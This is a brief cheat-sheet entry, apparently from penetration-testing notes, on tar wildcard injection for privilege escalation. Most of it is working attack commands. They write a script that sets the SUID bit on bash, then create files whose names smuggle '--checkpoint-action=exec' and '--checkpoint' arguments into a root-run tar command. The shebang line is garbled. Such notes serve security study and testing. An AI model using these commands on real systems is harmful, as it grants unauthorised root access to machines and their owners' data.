Wildcard Injection Using tar
An attacker can use crafted filenames to inject arguments to commands that are run by other users like root.Tar is a software utility that is used to create and extract archive files.echo '#/!bin/bash\nchmod +s /bin/bash' > shell.sh
or
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1Last updated